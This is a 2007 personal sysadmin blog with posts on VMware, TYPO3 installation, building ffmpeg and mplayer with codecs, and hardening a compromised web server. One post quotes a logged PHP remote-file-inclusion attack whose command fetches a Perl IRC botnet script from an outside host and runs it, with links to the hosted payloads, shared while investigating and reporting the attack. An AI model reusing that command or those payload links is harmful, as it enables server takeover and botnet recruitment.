Friday, July 13, 2007

We use vmware to escape spyware , to run ubuntu and then kubuntu
in parallel machines and without adware
When memory is small is time for xubuntu , also sometime
we try gobuntu.
Is like running an os in an bottle , viruses can't escape if you try windows vm
is good to reduce the number of servers needed for testing, and trying new stuff (ubuntu gutsy gibbon) or weird operating systems reactos , vista
or antique stuff : redhat, or centos
with vmware server we run many operating systems in parallel , each os distributed for one cpu
is good also for migrations from windows to linux and running both
just one good step to world domination and and fixing the bug #1 https://launchpad.net/ubuntu/+bug/1
http://mshiltonj.com/software_wars/current/
http://homepage.sunrise.ch/mysunrise/ekeller00/EricKellerUbuntuPage.html
http://www.oszoo.org/wiki/index.php/Main_Page
http://www.oszoo.org/wiki/index.php/Category:OS_images

Thursday, July 12, 2007

installing typo3 - 4.0.x with ftp
In order to set up a new site, you will need to combine both, the source AND the dummy package by extracting them to the same folder.)

download the dummy with source zip
unzip typo3_src+dummy-4.1.5.zip

Run these commands as root in the dummy directory:

# chmod -R g+w,o-rwx fileadmin typo3conf typo3temp uploads


upload files with ftp (ftp in my case)

7 In your browser, visit
http://[your.site.name]/cms/

8 Follow the instructions in the 1-2-3 install tool

9 From this point, you can access the backend through
http://[your.site.name]/cms/typo3/
with the username "admin" and password "password".




typo3.org: Packages

technorati tags:, , , ,

Blogged with Flock

3gp, 2gp , mp4 conversion issues with ffmpeg

ffmpeg accepts only encoding 3gp , 2gp , mp4 files (E- means encoding D-deconding)
ffmpeg -formats | grep 3gp

E 3g2 3gp2 format
E 3gp 3gp format
DE amr 3gpp amr file format
D mov,mp4,m4a,3gp,3g2,mj2 QuickTime/MPEG4/Motion JPEG 2000 format
ffmpeg -formats | grep mp4

E mp4 mp4 format
E psp psp mp4 format


so it is needed that mencoder to be used to decode the
3gp,2gp,mp4 files



mencoder example.3g2 -nosound -ovc lavc -lavcopts
vcodec=mpeg4 -o example.avi
mplayer -vo null -ao pcm -af
resample=8000,volume=+4db:sc example.3g2
ffmpeg -i example.avi -i audiodump.wav example.flv

Wednesday, July 11, 2007

grep cmd access.log
Today i was inspecting the logs

189.23.39.114 - - [11/Jul/2007:03:20:43 -0400] "GET /fooo.php?fooo=http://www.freewebs.com/cuza0/tool25.dat?&cmd=cd%20/tmp;rm%20-rf%20botnet*;wget%20http://www.freewebs.com/nkparceria/botnet.txt;lwp-download%20http://www.freewebs.com/nkparceria/botnet.txt;fetch%20http://www.freewebs.com/nkparceria/botnet.txt;curl%20-o%20botnet.txt%20http://www.freewebs.com/nkparceria/botnet.txt;GET%20http://www.freewebs.com/nkparceria/botnet.txt%20>botnet.txt;lynx%20-source%20http://www.freewebs.com/nkparceria/botnet.txt%20>botnet.txt;perl%20botnet.txt;rm%20-rf%20botnet.txt* HTTP/1.1" 200 4812 "-" "Mozilla/3.0 (compatible; Indy Library)"

you can see the php code here
http://www.freewebs.com/cuza0/tool25.dat
and irc perl bot is here
http://www.freewebs.com/nkparceria/botnet.txt

Now i inform the freewebs about this hosting of the evil scripts
mplayer/ffmpeg conversion issues (compressed swf and h264)
In this part i solved some issues with decoding/encoding


1.added support for h264
http://www.videolan.org/developers/x264.html
# svn co svn://svn.videolan.org/x264/trunk x264
cd x264
./configure --prefix=/usr
make ; make install
2 wget http://ftp.debian.org/debian/pool/main/f/faad2/faad2_2.5.orig.tar.g
tar -zxvf faad2_2.5.orig.tar.gz
cd faad2-2.5/
./configure --prefix=/usr; make ; make install
3.added support in configure script for x264 and theora(ffmpeg)
apt-get install libtheora

svn checkout svn://svn.mplayerhq.hu/ffmpeg/trunk ffmpeg
./configure --prefix=/usr --enable-libamr-nb --enable-libamr-wb --enable-libogg --enable-libvorbis --enable-libgsm --enable-libxvid --enable-liba52 --enable-libmp3lame --enable-libx264 --enable-libtheora --enable-libfaad --enable-gpl --enable-shared --enable-pthreads --enable-swscaler
4. found the issue with the compiled swf
http://lists.mplayerhq.hu/pipermail/ffmpeg-user/2006-December/005587.html
5.recompiled mplayer/mencoder from svn
svn checkout svn://svn.mplayerhq.hu/mplayer/trunk mplayer
cd mplayer
./configure --prefix=/usr
make; make install

Tuesday, July 10, 2007

we secured one server for an annonymous client

The ISC handler mailbox has received multiple reports of web site defacement attempts apparently using the "Defacing Tool 2.0 by r3v3ng4ns" suite of php based scripts intended to deface websites leveraging PHP remote file inclusion
[The box i found this tool was an old rh8.0 box with default php and httpd and allow_url_fopen on !!, solution was to compile all the newest and the greatest stable versions that works for that site
httpd-2.2.4 (latest recomeded)
mod_perl-2.0.3
php-4.4.7
tomcat-connectors-1.2.23 (mod_jk)

I  work now to upgrade  openssh to newest version http://openssh.org/
ssh should only permit access with ssh_key and not with the plain text like is configured now and access should be restrincted to a few users 
I will  continue after that with aide installation and log monitoring.
 then will install mod_security after all  http://www.securityfocus.com/infocus/1706
]

SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

technorati tags:, , , , , , , , ,

Blogged with Flock

Wednesday, July 04, 2007

compiling ffmpeg (and mplayer) with amr7 support
http://www.penguin.cz/~utx/amr
apt-get install libgsm1-dev toolame libgsm1-dev libvorbis-dev libogg-dev
apt-get install libfaad2-dev
apt-get install subversion
apt-get install libgsm1-dev libgsmme-dev
apt-get install unzip
apt-get install liba52-0.7.4-dev
apt-get install patch

wget http://downloads.xvid.org/downloads/xvidcore-1.1.2.tar.bz2
tar -jxf xvidcore-1.1.2.tar.bz2
wget http://mesh.dl.sourceforge.net/sourceforge/lame/lame-3.97.tar.gz
tar -zxvf lame-3.97.tar.gz
cd lame-3.97
./configure --prefix=/usr;make;make install
cd ..
cd xvidcore-1.1.2/build/generic/
./configure --prefix=/usr;make;make install
cd ../../../

svn checkout svn://svn.mplayerhq.hu/ffmpeg/trunk ffmpeg
cd ffmpeg/libavcodec/
mkdir amrwb_float
cd amrwb_float
wget http://www.3gpp.org/ftp/Specs/archive/26_series/26.204/26204-510.zip
unzip 26204-510.zip
unzip 26204-510_ANSI-C_source_code.zip
cd ..
mkdir amr_float
cd amr_float
wget http://www.3gpp.org/ftp/Specs/archive/26_series/26.104/26104-510.zip
unzip 26104-510.zip
unzip 26104-510_ANSI_C_source_code.zip
cd ../../
wget http://ftp.penguin.cz/pub/users/utx/amr/amrwb-7.0.0.1.tar.bz2
tar -jxvf amrwb-7.0.0.1.tar.bz2
cd amrwb-7.0.0.1
./configure --prefix=/usr ; make ; make install
wget http://ftp.penguin.cz/pub/users/utx/amr/amrnb-6.1.0.4.tar.bz2
tar -jxvf amrnb-6.1.0.4.tar.bz2
cd amrnb-6.1.0.4
./configure --prefix=/usr ; make ; make install

./configure --prefix=/usr --enable-libamr-nb --enable-libamr-wb --enable-libogg --enable-libvorbis --enable-libgsm --enable-libxvid --enable-liba52 --enable-libmp3lame --enable-gpl;
make ; make install
cd ..
wget http://www2.mplayerhq.hu/MPlayer/releases/MPlayer-1.0rc1.tar.bz2
wget http://www2.mplayerhq.hu/MPlayer/releases/codecs/essential-20061022.tar.bz2
tar -jxvf essential-20061022.tar.bz2
mkdir /usr/lib/codecs/
cd essential-20061022
mv * /usr/lib/codecs/
cd ..
cd MPlayer-1.0rc1/
./configure --prefix=/opt/mplayer
make; make install